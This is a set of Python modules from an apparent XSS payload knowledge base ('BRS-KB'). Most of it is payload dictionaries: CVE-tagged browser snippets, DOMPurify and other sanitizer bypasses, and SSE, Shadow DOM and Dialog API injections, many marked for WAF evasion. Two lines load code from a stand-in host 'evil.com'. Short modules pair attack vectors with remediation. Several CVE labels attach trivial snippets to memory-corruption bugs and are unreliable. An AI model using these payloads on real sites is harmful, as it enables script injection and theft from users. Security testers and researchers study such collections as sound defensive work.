        contexts=["javascript"],
        severity="critical",
        cvss_score=9.0,
        description="CVE-2022-1096: V8 type confusion in Array",
        tags=["cve", "v8", "array", "2022"],
        bypasses=["prototype_filters"],
        waf_evasion=True,
        browser_support=["chrome"],
        reliability="low",
    ),
    # CVE-2021-21220 - V8 Incorrect bytecode
    "cve-2021-21220-bytecode": PayloadEntry(
        payload="function f(){const a=[];a[0]=1.1;return a}",
        contexts=["javascript"],
        severity="high",
        cvss_score=8.0,
        description="CVE-2021-21220: V8 bytecode vulnerability",
        tags=["cve", "v8", "bytecode", "2021"],
        bypasses=["jit"],
        waf_evasion=True,
        browser_support=["chrome"],
        reliability="low",
    ),
    # CVE-2020-16040 - V8 Insufficient Data Validation
    "cve-2020-16040-validation": PayloadEntry(
        payload="Object.defineProperty([],'length',{value:0xffffffff})",
        contexts=["javascript"],
        severity="high",
        cvss_score=8.0,
        description="CVE-2020-16040: V8 data validation bypass",
        tags=["cve", "v8", "validation", "2020"],
        bypasses=["length_filters"],
        waf_evasion=True,
        browser_support=["chrome"],
        reliability="low",
    ),
    # CVE-2019-11707 - Firefox IonMonkey
    "cve-2019-11707-ionmonkey": PayloadEntry(
        payload="Array.prototype.push.apply([],{length:0xffffffff})",
        contexts=["javascript"],
        severity="critical",
        cvss_score=9.0,
        description="CVE-2019-11707: Firefox IonMonkey type confusion",
        tags=["cve", "firefox", "ionmonkey", "2019"],
        bypasses=["jit"],
        waf_evasion=True,
        browser_support=["firefox"],
        reliability="low",
    ),
    # CVE-2019-11708 - Firefox Sandbox Escape
    "cve-2019-11708-sandbox": PayloadEntry(
        payload="navigator.serviceWorker.register('//evil.com/sw.js')",
        contexts=["javascript"],
        severity="critical",
        cvss_score=9.5,
        description="CVE-2019-11708: Firefox sandbox escape pattern",
        tags=["cve", "firefox", "sandbox", "2019"],
        bypasses=["sandbox"],
        waf_evasion=True,
        browser_support=["firefox"],
        reliability="low",
    ),
    # CVE-2021-26411 - IE Memory Corruption
    "cve-2021-26411-ie": PayloadEntry(
        payload='<object data="javascript:alert(1)">',
        contexts=["html_content"],
        severity="critical",
        cvss_score=9.0,
        description="CVE-2021-26411: IE object data vulnerability",
        tags=["cve", "ie", "object", "2021"],
        bypasses=["object_filters"],
        waf_evasion=True,
        browser_support=["ie"],
        reliability="medium",
    ),
    # CVE-2021-21193 - Chrome Heap Buffer Overflow in V8
    "cve-2021-21193-heap": PayloadEntry(
        payload="new ArrayBuffer(0x7fffffff)",
        contexts=["javascript"],
        severity="high",
        cvss_score=8.0,
        description="CVE-2021-21193: V8 heap buffer overflow",
        tags=["cve", "v8", "heap", "2021"],
        bypasses=["buffer_filters"],
        waf_evasion=True,
        browser_support=["chrome"],
        reliability="low",
    ),
    # CVE-2022-22620 - WebKit UAF
    "cve-2022-22620-webkit": PayloadEntry(
        payload='<animate onend="alert(1)">',
        contexts=["svg"],
        severity="critical",
        cvss_score=9.0,
        description="CVE-2022-22620: WebKit use-after-free in animation",
        tags=["cve", "webkit", "safari", "2022"],
        bypasses=["svg_filters"],
        waf_evasion=True,
        browser_support=["safari"],
        reliability="low",
    ),
    # CVE-2022-26485 - Firefox XSLT UAF
    "cve-2022-26485-xslt": PayloadEntry(
        payload='<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><script>alert(1)</script></xsl:template></xsl:stylesheet>',
        contexts=["xml"],
        severity="critical",
        cvss_score=9.0,
        description="CVE-2022-26485: Firefox XSLT processing vulnerability",
        tags=["cve", "firefox", "xslt", "2022"],
        bypasses=["xslt_filters"],
        waf_evasion=True,
        browser_support=["firefox"],
        reliability="low",
    ),
    # CVE-2022-26486 - Firefox WebGPU
    "cve-2022-26486-webgpu": PayloadEntry(
        payload="navigator.gpu?.requestAdapter().then(a=>alert(a))",
        contexts=["javascript"],
        severity="high",
        cvss_score=8.0,
        description="CVE-2022-26486: Firefox WebGPU vulnerability",
        tags=["cve", "firefox", "webgpu", "2022"],
        bypasses=["gpu_filters"],
        waf_evasion=True,
        browser_support=["firefox", "chrome"],
        reliability="low",
    ),
    # ============================================================
    # SANITIZER BYPASSES (DOMPurify, etc.)
    # ============================================================
    # DOMPurify < 2.0.17 mXSS
    "dompurify-2.0.17-mxss": PayloadEntry(
        payload="<math><mtext><table><mglyph><style><img src=x onerror=alert(1)>",
        contexts=["html_content"],
        severity="critical",
        cvss_score=9.0,
        description="DOMPurify < 2.0.17 mutation XSS bypass",
        tags=["dompurify", "mxss", "bypass"],
        bypasses=["dompurify"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    # DOMPurify < 2.2.2 namespace bypass
    "dompurify-2.2.2-namespace": PayloadEntry(
        payload='<svg><p><style><g title="</style><img src onerror=alert(1)>">',
        contexts=["html_content"],
        severity="critical",
        cvss_score=9.0,
        description="DOMPurify < 2.2.2 namespace confusion",
        tags=["dompurify", "namespace", "bypass"],
        bypasses=["dompurify"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    # DOMPurify < 2.3.0 SVG bypass
    "dompurify-2.3.0-svg": PayloadEntry(
        payload='<svg><a><rect width="100" height="100"></rect><set attributeName="href" to="javascript:alert(1)"/></a></svg>',
        contexts=["html_content", "svg"],
        severity="critical",
        cvss_score=9.0,
        description="DOMPurify < 2.3.0 SVG set element bypass",
        tags=["dompurify", "svg", "bypass"],
        bypasses=["dompurify"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari"],
        reliability="medium",
    ),
    # js-xss bypass
    "js-xss-bypass-1": PayloadEntry(
        payload='<a href="javasc&#x72;ipt:alert(1)">click</a>',
        contexts=["html_content"],
        severity="high",
        cvss_score=8.0,
        description="js-xss library entity bypass",
        tags=["js-xss", "entity", "bypass"],
        bypasses=["js-xss"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    # sanitize-html bypass
    "sanitize-html-bypass": PayloadEntry(
        payload='<div data-x="<img src=x onerror=alert(1)>">',
        contexts=["html_content"],
        severity="high",
        cvss_score=8.0,
        description="sanitize-html data attribute bypass",
        tags=["sanitize-html", "data", "bypass"],
        bypasses=["sanitize-html"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    # Google Caja bypass
    "caja-bypass-1": PayloadEntry(
        payload='<div onclick="___ONERROR_HANDLER___.call(this,event)">click</div>',
        contexts=["html_content"],
        severity="high",
        cvss_score=8.0,
        description="Google Caja sandbox bypass",
        tags=["caja", "sandbox", "bypass"],
        bypasses=["caja"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
}



#!/usr/bin/env python3

"""
Project: BRS-KB
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26
Status: Created
Telegram: https://t.me/easyprotech

Knowledge Base: WebSocket Message XSS
"""

DETAILS = {
    "title": "Cross-Site Scripting (XSS) via WebSocket Messages",
    "severity": "high",
    "cvss_score": 7.5,
    "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
    "reliability": "certain",
    "cwe": ["CWE-79"],
    "owasp": ["A03:2021"],
    "tags": ["xss", "websocket", "realtime", "chat", "message", "socket.io"],
    "description": """
WebSocket message XSS occurs when data received via WebSocket is rendered in the DOM
without sanitization. Common in chat apps, live feeds, and real-time dashboards.

SEVERITY: HIGH
WebSocket messages bypass traditional request/response validation.
Data is often trusted because it comes from the server.
""",
    "attack_vector": """
ONMESSAGE HANDLER:
ws.onmessage = (e) => {
  div.innerHTML = e.data;  // XSS!
};
// Message: <script>alert(1)</script>

JSON MESSAGE:
ws.onmessage = (e) => {
  const msg = JSON.parse(e.data);
  chat.innerHTML += `<p>${msg.text}</p>`;  // XSS!
};

SOCKET.IO:
socket.on('message', (data) => {
  $('#messages').append(`<li>${data.text}</li>`);
});

BINARY MESSAGE:
ws.binaryType = 'blob';
ws.onmessage = (e) => {
  // Blob converted to text and rendered
};

BROADCAST MESSAGE:
// Attacker sends XSS to all connected clients
socket.emit('broadcast', '<img src=x onerror=alert(1)>');

NOTIFICATION:
ws.onmessage = (e) => {
  new Notification(e.data);  // Can contain XSS if shown in DOM
};

RECONNECT MESSAGE:
// XSS in reconnection data
socket.on('reconnect', () => {
  div.innerHTML = socket.data;
});
""",
    "remediation": """
DEFENSE:

1. SANITIZE all WebSocket message data
2. Use textContent, not innerHTML
3. Validate message format/schema
4. Authenticate WebSocket connections
5. Rate limit messages
6. Implement CSP

SAFE PATTERN:
ws.onmessage = (event) => {
  const data = JSON.parse(event.data);
  const p = document.createElement('p');
  p.textContent = data.text;  // Safe
  chat.appendChild(p);
};

// With sanitization:
ws.onmessage = (event) => {
  const clean = DOMPurify.sanitize(event.data);
  div.innerHTML = clean;
};

SOCKET.IO SAFE:
socket.on('message', (data) => {
  const li = document.createElement('li');
  li.textContent = data.text;
  document.getElementById('messages').appendChild(li);
});

OWASP REFERENCES:
- CWE-79: Cross-site Scripting
- WebSocket Security Best Practices
""",
}



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Shadow DOM XSS Payloads
"""

from ..models import PayloadEntry


SHADOW_DOM_PAYLOADS = {
    "shadow_1": PayloadEntry(
        payload="<script>let s=document.body.attachShadow({mode:'open'});s.innerHTML='<img src=x onerror=alert(1)>'</script>",
        contexts=["html_content", "javascript"],
        severity="high",
        cvss_score=7.5,
        description="Shadow DOM innerHTML XSS",
        tags=["shadow-dom", "innerHTML"],
        reliability="high",
    ),
    "shadow_2": PayloadEntry(
        payload="<div id=h></div><script>h.attachShadow({mode:'open'}).innerHTML='<slot name=\"x\"></slot>';h.innerHTML='<img slot=x src=x onerror=alert(1)>'</script>",
        contexts=["html_content", "javascript"],
        severity="high",
        cvss_score=7.5,
        description="Shadow DOM slot XSS",
        tags=["shadow-dom", "slot"],
        reliability="high",
    ),
    "shadow_3": PayloadEntry(
        payload="<script>let s=document.body.attachShadow({mode:'closed'});s.innerHTML='<style>:host{background:url(javascript:alert(1))}</style>'</script>",
        contexts=["html_content", "javascript"],
        severity="high",
        cvss_score=7.0,
        description="Closed Shadow DOM with CSS XSS",
        tags=["shadow-dom", "closed", "css"],
        reliability="low",
    ),
}

SHADOW_DOM_PAYLOADS_TOTAL = len(SHADOW_DOM_PAYLOADS)



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Created
Telegram: https://t.me/EasyProTech

ARIA Attributes Context - Data Module
"""

DESCRIPTION = """
ARIA (Accessible Rich Internet Applications) attributes provide accessibility.
Vulnerabilities occur when user input is injected into ARIA attributes,
allowing XSS attacks through attribute manipulation or event handler injection.

Vulnerability occurs when:
- User-controlled data is injected into ARIA attribute values
- ARIA event handlers contain user input
- ARIA role values are user-controlled
- ARIA state properties use user input
- Attribute names are manipulated

Common injection points:
- aria-label attribute
- aria-labelledby attribute
- aria-describedby attribute
- aria-valuetext attribute
- aria-live attribute
- Event handlers in ARIA attributes
"""

ATTACK_VECTOR = """
1. aria-label injection:
   <div aria-label="USER_INPUT">content</div>

2. aria-labelledby injection:
   <div aria-labelledby="USER_INPUT">content</div>

3. aria-describedby injection:
   <div aria-describedby="USER_INPUT">content</div>

4. aria-valuetext injection:
   <div role="slider" aria-valuetext="USER_INPUT"></div>

5. Event handler injection:
   <div aria-label="text" onclick="USER_INPUT">content</div>

6. Role manipulation:
   <div role="USER_INPUT">content</div>
"""

REMEDIATION = """
1. Sanitize all user input before using in ARIA attributes
2. Validate ARIA attribute values
3. Escape HTML entities in attribute values
4. Use Content Security Policy (CSP)
5. Validate ARIA role values against allowlist
6. Never use user input in event handlers
7. Audit all ARIA attribute usage for user input
8. Use framework-safe attribute handling
"""



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Server-Sent Events XSS Payloads
"""

from ..models import PayloadEntry


SSE_PAYLOADS = {
    # Data injection
    "sse_data_script": PayloadEntry(
        payload="data: <script>alert(1)</script>",
        contexts=["sse", "html_content"],
        severity="critical",
        cvss_score=8.8,
        description="SSE data field script injection",
        tags=["sse", "data", "xss"],
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="certain",
    ),
    "sse_data_img": PayloadEntry(
        payload="data: <img src=x onerror=alert(1)>",
        contexts=["sse", "html_content"],
        severity="critical",
        cvss_score=8.8,
        description="SSE data field image XSS",
        tags=["sse", "data", "image"],
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="certain",
    ),
    "sse_data_json": PayloadEntry(
        payload='data: {"message":"<script>alert(1)</script>"}',
        contexts=["sse", "json"],
        severity="critical",
        cvss_score=8.8,
        description="SSE JSON data XSS",
        tags=["sse", "data", "json"],
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="certain",
    ),
    "sse_data_multiline": PayloadEntry(
        payload="data: <script>\\ndata: alert(1)\\ndata: </script>",
        contexts=["sse", "html_content"],
        severity="critical",
        cvss_score=8.8,
        description="SSE multiline data XSS",
        tags=["sse", "data", "multiline"],
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "sse_data_proto": PayloadEntry(
        payload='data: {"__proto__":{"innerHTML":"<img src=x onerror=alert(1)>"}}',
        contexts=["sse", "json"],
        severity="critical",
        cvss_score=9.0,
        description="SSE prototype pollution",
        tags=["sse", "data", "prototype-pollution"],
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    # Event injection
    "sse_event_xss": PayloadEntry(
        payload="event: xss\\ndata: <script>alert(1)</script>",
        contexts=["sse_event", "html_content"],
        severity="critical",
        cvss_score=8.8,
        description="SSE custom event XSS",
        tags=["sse", "event", "xss"],
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="certain",
    ),
    "sse_event_message": PayloadEntry(
        payload="event: message\\ndata: <script>alert(1)</script>",
        contexts=["sse_event", "html_content"],
        severity="critical",
        cvss_score=8.8,
        description="SSE message event XSS",
        tags=["sse", "event", "message"],
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="certain",
    ),
    # ID injection
    "sse_id_xss": PayloadEntry(
        payload='id: "><script>alert(1)</script>',
        contexts=["sse_id"],
        severity="high",
        cvss_score=7.5,
        description="SSE ID field XSS",
        tags=["sse", "id", "xss"],
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    # URL injection
    "sse_url_callback": PayloadEntry(
        payload="/events?callback=alert",
        contexts=["sse_url", "url"],
        severity="high",
        cvss_score=7.5,
        description="EventSource URL callback injection",
        tags=["sse", "url", "callback"],
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "sse_url_data": PayloadEntry(
        payload="data:text/event-stream,data: <script>alert(1)</script>",
        contexts=["sse_url", "url"],
        severity="critical",
        cvss_score=8.8,
        description="EventSource data URL XSS",
        tags=["sse", "url", "data-url"],
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    # Handler injection
    "sse_handler_eval": PayloadEntry(
        payload="function(e){eval(e.data)}",
        contexts=["sse_handler", "javascript"],
        severity="critical",
        cvss_score=9.0,
        description="EventSource onmessage eval handler",
        tags=["sse", "handler", "eval"],
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="certain",
    ),
    "sse_handler_innerhtml": PayloadEntry(
        payload="(e)=>document.body.innerHTML=e.data",
        contexts=["sse_handler", "javascript"],
        severity="critical",
        cvss_score=9.0,
        description="EventSource innerHTML handler",
        tags=["sse", "handler", "innerhtml"],
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="certain",
    ),
}

SSE_PAYLOADS_TOTAL = len(SSE_PAYLOADS)



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Created
Telegram: https://t.me/EasyProTech

CSS @import Injection Context - Data Module
"""

DESCRIPTION = """
CSS @import allows importing external stylesheets.
Vulnerabilities occur when user input is injected into @import rules,
allowing XSS attacks through malicious stylesheet loading or CSS injection.

Vulnerability occurs when:
- User-controlled data is injected into @import URLs
- @import URLs point to malicious resources
- CSS injection occurs through @import
- Stylesheet content is user-controlled
- @import uses javascript: protocol

Common injection points:
- @import URL values
- @import url() function
- Stylesheet href attributes
- Link rel="stylesheet" href
- Style tag @import rules
"""

ATTACK_VECTOR = """
1. URL injection:
   @import "USER_INPUT";

2. JavaScript protocol:
   @import "javascript:alert(1)";

3. Data URL:
   @import "data:text/css,body{background:url('javascript:alert(1)')}";

4. External stylesheet:
   @import url("https://evil.com/xss.css");

5. Link tag injection:
   <link rel="stylesheet" href="USER_INPUT">
"""

REMEDIATION = """
1. Never allow user input in @import URLs
2. Whitelist allowed stylesheet sources
3. Block javascript: and data: protocols
4. Validate @import URLs against allowlist
5. Use Content Security Policy (CSP) with style-src
6. Sanitize CSS before parsing
7. Audit all CSS generation code for user input
8. Use framework-safe CSS handling
"""



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Created
Telegram: https://t.me/EasyProTech

Dialog API XSS Payloads

Dialog API allows creating modal dialogs.
Can be used for XSS via close and cancel events.
"""

from ..models import PayloadEntry


DIALOG_API_PAYLOADS = {
    # ============================================================
    # DIALOG API EVENT HANDLERS
    # ============================================================
    "dialog-close-basic": PayloadEntry(
        payload="<dialog id=x onclose=alert(1)><form method=dialog><button>Close</button></form></dialog><script>x.showModal()</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API close event handler",
        tags=["dialog", "close", "api", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-close-open": PayloadEntry(
        payload="<dialog id=x open onclose=alert(1)><form method=dialog><button>Close</button></form></dialog>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API close event on open dialog",
        tags=["dialog", "close", "open", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-close-showModal": PayloadEntry(
        payload="<dialog id=x onclose=alert(1)><form method=dialog><button>Close</button></form></dialog><script>x.showModal()</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API close event via showModal()",
        tags=["dialog", "close", "showModal", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-close-show": PayloadEntry(
        payload="<dialog id=x onclose=alert(1)><form method=dialog><button>Close</button></form></dialog><script>x.show()</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API close event via show()",
        tags=["dialog", "close", "show", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-close-close": PayloadEntry(
        payload="<dialog id=x open onclose=alert(1)><form method=dialog><button>Close</button></form></dialog><script>x.close()</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API close event via close()",
        tags=["dialog", "close", "close-method", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-close-form": PayloadEntry(
        payload="<dialog id=x onclose=alert(1)><form method=dialog><input type=submit value=Close></form></dialog><script>x.showModal()</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API close event via form submission",
        tags=["dialog", "close", "form", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-close-button": PayloadEntry(
        payload="<dialog id=x onclose=alert(1)><button formmethod=dialog>Close</button></dialog><script>x.showModal()</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API close event via button formmethod",
        tags=["dialog", "close", "button", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-close-escape": PayloadEntry(
        payload="<dialog id=x open onclose=alert(1)>Press ESC</dialog>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=6.5,
        description="Dialog API close event via ESC key",
        tags=["dialog", "close", "escape", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    "dialog-close-click": PayloadEntry(
        payload="<dialog id=x open onclose=alert(1)>Click backdrop</dialog>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=6.5,
        description="Dialog API close event via backdrop click",
        tags=["dialog", "close", "backdrop", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    "dialog-close-cancel": PayloadEntry(
        payload="<dialog id=x onclose=alert(1) oncancel=alert(2)><form method=dialog><button>Close</button></form></dialog><script>x.showModal();x.close()</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API close and cancel events",
        tags=["dialog", "close", "cancel", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-cancel-basic": PayloadEntry(
        payload="<dialog id=x oncancel=alert(1)><form method=dialog><button>Close</button></form></dialog><script>x.showModal();x.close()</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API cancel event handler",
        tags=["dialog", "cancel", "api", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-cancel-escape": PayloadEntry(
        payload="<dialog id=x open oncancel=alert(1)>Press ESC</dialog>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=6.5,
        description="Dialog API cancel event via ESC key",
        tags=["dialog", "cancel", "escape", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    "dialog-close-innerHTML": PayloadEntry(
        payload="<dialog id=x onclose=alert(1)><img src=x onerror=alert(2)><form method=dialog><button>Close</button></form></dialog><script>x.showModal()</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API close event with innerHTML injection",
        tags=["dialog", "close", "innerHTML", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-cancel-innerHTML": PayloadEntry(
        payload="<dialog id=x oncancel=alert(1)><img src=x onerror=alert(2)></dialog><script>x.showModal();x.close()</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API cancel event with innerHTML injection",
        tags=["dialog", "cancel", "innerHTML", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-close-svg": PayloadEntry(
        payload="<dialog id=x onclose=alert(1)><svg onload=alert(2)></svg><form method=dialog><button>Close</button></form></dialog><script>x.showModal()</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API close event with SVG injection",
        tags=["dialog", "close", "svg", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-cancel-svg": PayloadEntry(
        payload="<dialog id=x oncancel=alert(1)><svg onload=alert(2)></svg></dialog><script>x.showModal();x.close()</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API cancel event with SVG injection",
        tags=["dialog", "cancel", "svg", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-close-form-action": PayloadEntry(
        payload="<dialog id=x onclose=alert(1)><form method=dialog action=javascript:alert(2)><input type=submit></form></dialog><script>x.showModal()</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API close event with form action injection",
        tags=["dialog", "close", "form-action", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-close-iframe": PayloadEntry(
        payload='<dialog id=x onclose=alert(1)><iframe srcdoc="<script>alert(2)</script>"></iframe><form method=dialog><button>Close</button></form></dialog><script>x.showModal()</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API close event with iframe injection",
        tags=["dialog", "close", "iframe", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-cancel-iframe": PayloadEntry(
        payload='<dialog id=x oncancel=alert(1)><iframe srcdoc="<script>alert(2)</script>"></iframe></dialog><script>x.showModal();x.close()</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API cancel event with iframe injection",
        tags=["dialog", "cancel", "iframe", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "dialog-close-nested": PayloadEntry(
        payload='<dialog id=x onclose=alert(1)><dialog id=y onclose=alert(2)><form method=dialog><button>Close</button></form></dialog><form method=dialog><button onclick="y.showModal()">Open Nested</button></form></dialog><script>x.showModal()</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Dialog API nested close events",
        tags=["dialog", "close", "nested", "2024"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
}

DIALOG_API_TOTAL_PAYLOADS = len(DIALOG_API_PAYLOADS)



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-10-14 22:53:00 MSK
Status: Created
Telegram: https://t.me/easyprotech

Vulnerability Contexts Package
"""

# This package contains all vulnerability context modules
# Each module exports a DETAILS dictionary with vulnerability information



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Created
Telegram: https://t.me/EasyProTech

Trusted Types Bypass Context - Data Module
"""

DESCRIPTION = """
Trusted Types API provides runtime protection against DOM-based XSS.
However, various bypass techniques exist that can circumvent Trusted Types
protection, allowing XSS attacks even when Trusted Types is enabled.

Vulnerability occurs when:
- Trusted Types policies are misconfigured
- Bypass techniques exploit policy weaknesses
- Legacy APIs bypass Trusted Types checks
- Browser-specific behaviors circumvent protection
- Policy creation uses user input

Common bypass techniques:
- document.write() and writeln() bypasses
- innerHTML with trusted sinks
- createElement with user input
- setAttribute bypasses
- Legacy API exploitation
"""

ATTACK_VECTOR = """
1. document.write bypass:
   document.write(USER_INPUT)

2. createElement bypass:
   const el = document.createElement('script');
   el.textContent = USER_INPUT;
   document.body.appendChild(el);

3. setAttribute bypass:
   const el = document.createElement('div');
   el.setAttribute('onclick', USER_INPUT);

4. Legacy API bypass:
   document.body.insertAdjacentHTML('beforeend', USER_INPUT);

5. Policy bypass:
   const policy = trustedTypes.createPolicy('policy', {
       createHTML: (s) => s
   });
   document.body.innerHTML = policy.createHTML(USER_INPUT);
"""

REMEDIATION = """
1. Implement strict Trusted Types policies
2. Never allow user input in policy creation functions
3. Use default policy for all sinks
4. Audit all DOM manipulation code
5. Disable legacy APIs that bypass Trusted Types
6. Use Content Security Policy with require-trusted-types-for
7. Validate policy configurations
8. Test bypass techniques regularly
"""



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Absolute Final XSS Payloads

The TRULY final extraction - techniques I almost forgot,
research papers, academic exploits, browser-specific quirks,
and the most obscure corners of my knowledge.

Refactored into 4 parts for better maintainability.
"""

from .brs_kb_extra_part1 import BRS_KB_ABSOLUTE_FINAL_PAYLOADS_PART1
from .brs_kb_extra_part2 import BRS_KB_ABSOLUTE_FINAL_PAYLOADS_PART2
from .brs_kb_extra_part3 import BRS_KB_ABSOLUTE_FINAL_PAYLOADS_PART3
from .brs_kb_extra_part4 import BRS_KB_ABSOLUTE_FINAL_PAYLOADS_PART4


BRS_KB_ABSOLUTE_FINAL_PAYLOADS = {
    **BRS_KB_ABSOLUTE_FINAL_PAYLOADS_PART1,
    **BRS_KB_ABSOLUTE_FINAL_PAYLOADS_PART2,
    **BRS_KB_ABSOLUTE_FINAL_PAYLOADS_PART3,
    **BRS_KB_ABSOLUTE_FINAL_PAYLOADS_PART4,
}

BRS_KB_ABSOLUTE_FINAL_TOTAL_PAYLOADS = len(BRS_KB_ABSOLUTE_FINAL_PAYLOADS)



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
